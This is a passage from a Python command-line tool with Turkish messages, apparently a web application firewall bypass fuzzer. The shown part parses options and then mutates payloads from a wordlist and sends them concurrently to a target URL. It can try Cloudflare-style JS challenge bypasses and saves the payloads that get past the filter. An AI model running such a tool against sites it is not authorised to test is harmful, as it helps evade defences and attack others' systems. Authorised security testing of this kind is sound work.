                        help="Mutation engine'i devre dışı bırak (payload'ları olduğu gibi gönder)")

    # Performans
    parser.add_argument("--concurrency", type=int, default=30,
                        help="Eşzamanlı istek sayısı (varsayılan: 30)")
    parser.add_argument("--rate-limit", type=float, default=0.0,
                        help="İstekler arası bekleme süresi saniye (varsayılan: 0)")
    parser.add_argument("--timeout", type=int, default=10,
                        help="İstek timeout süresi saniye (varsayılan: 10)")
    parser.add_argument("--chunked", action="store_true",
                        help="Chunked transfer encoding kullan (POST/PUT)")

    # JS Challenge
    parser.add_argument("--js-challenge", action="store_true",
                        help="Playwright ile JS challenge bypass dene (Cloudflare vb.)")

    # Çıktı
    parser.add_argument("--verbose", "-v", action="store_true",
                        help="Tüm sonuçları (bloklar dahil) göster")
    parser.add_argument("-o", "--output",
                        help="JSON rapor çıktı dosyası")
    parser.add_argument("--output-payloads",
                        help="Başarılı bypass payload'larını .txt olarak kaydet")
    parser.add_argument("--output-html",
                        help="Tüm sonuçları HTML rapora yaz (ör: rapor.html)")
    parser.add_argument("--report",
                        help="HTML rapor çıktı dosyası (ör: report.html)")
    parser.add_argument("--no-behavioral", action="store_true",
                        help="Davranışsal WAF fingerprint problarını atla (daha hızlı)")
    parser.add_argument("--force", action="store_true",
                        help="Baseline başarısız olsa bile devam et (false positive riski!)")
    parser.add_argument("--benign", default="safe_string_test_123",
                        help="Benign baseline string (varsayılan: safe_string_test_123)")

    args = parser.parse_args()

    console.print(BANNER)

    # --- Header parse ---
    headers = {}
    if args.header:
        for h in args.header:
            if ":" in h:
                k, v = h.split(":", 1)
                headers[k.strip().title()] = v.strip()

    # --- Cookie parse ---
    cookies = {}
    if args.cookies:
        for part in args.cookies.split(";"):
            if "=" in part:
                k, v = part.split("=", 1)
                cookies[k.strip()] = v.strip()

    # --- Payload yükle ---
    base_payloads = []
    if args.payload:
        base_payloads.append(args.payload)
    else:
        if not os.path.exists(args.wordlist):
            console.print(f"[danger]Wordlist bulunamadı: {args.wordlist}[/danger]")
            sys.exit(1)
        with open(args.wordlist, encoding="utf-8", errors="ignore") as f:
            for line in f:
                line = line.strip()
                if line and not line.startswith("#"):
                    base_payloads.append(line)

    if not base_payloads:
        console.print("[danger]Hiç payload yüklenmedi![/danger]")
        sys.exit(1)

    console.print(f"[info]Yüklenen payload sayısı: {len(base_payloads)}[/info]")

    # --- Fuzzer init ---
    fuzzer = WAFFuzzer(
        url=args.url, method=args.method, data=args.data,
        headers=headers, cookies=cookies, proxy=args.proxy,
        rate_limit=args.rate_limit, timeout=args.timeout,
        verbose=args.verbose, chunked=args.chunked,
        concurrency=args.concurrency, js_challenge=args.js_challenge,
    )

    # --- Baseline ---
    baseline_ok = await fuzzer.run_baseline(
        benign_str=args.benign,
        malicious_payload=base_payloads[0],
        behavioral=not args.no_behavioral,
    )
    if not baseline_ok and not args.force:
        console.print("[warning]Baseline başarısız. --force ile zorlamak için tekrar çalıştırın.[/warning]")
        sys.exit(1)
    elif not baseline_ok:
        console.print("[warning]--force: Baseline hatası görmezden gelinecek.[/warning]")
        # Dummy profiller
        from dataclasses import dataclass
        fuzzer.benign_profile  = BaselineProfile(200, 100, "", "")
        fuzzer.blocked_profile = BaselineProfile(403, 500, "", "access denied")

    # --- Mutation ---
    if args.no_mutate:
        all_mutations = base_payloads
        console.print(f"[muted]Mutation devre dışı. {len(all_mutations)} payload doğrudan gönderilecek.[/muted]")
    else:
        console.print(f"\n[primary]── Mutation Engine ({args.context}) ─────────────────────[/primary]")
        all_mutations_set: set[str] = set()
        for bp in base_payloads:
            variants = MutationEngine.generate(bp, context=args.context)
            all_mutations_set.update(variants)
        all_mutations = list(all_mutations_set)
        console.print(f"[info]{len(base_payloads)} payload → {len(all_mutations)} mutation üretildi[/info]")

    # --- Fuzz ---
    t0 = time.monotonic()
    await fuzzer.fuzz(all_mutations)
    elapsed = time.monotonic() - t0
    console.print(f"\n[muted]Süre: {elapsed:.1f}s | {len(all_mutations)/max(elapsed,0.1):.0f} req/s[/muted]")

    # --- Rapor ---
    fuzzer.display_report()

    # --- Export ---
    if args.output:
        fuzzer.export_json(args.output)
    if args.output_payloads:
        fuzzer.export_txt(args.output_payloads)
    if args.output_html:
        fuzzer.export_html(args.output_html)
    if args.report:
        fuzzer.export_html(args.report)


if __name__ == "__main__":
    if sys.platform == "win32":
        asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        console.print("\n[danger]Kullanıcı tarafından durduruldu.[/danger]")
        sys.exit(0)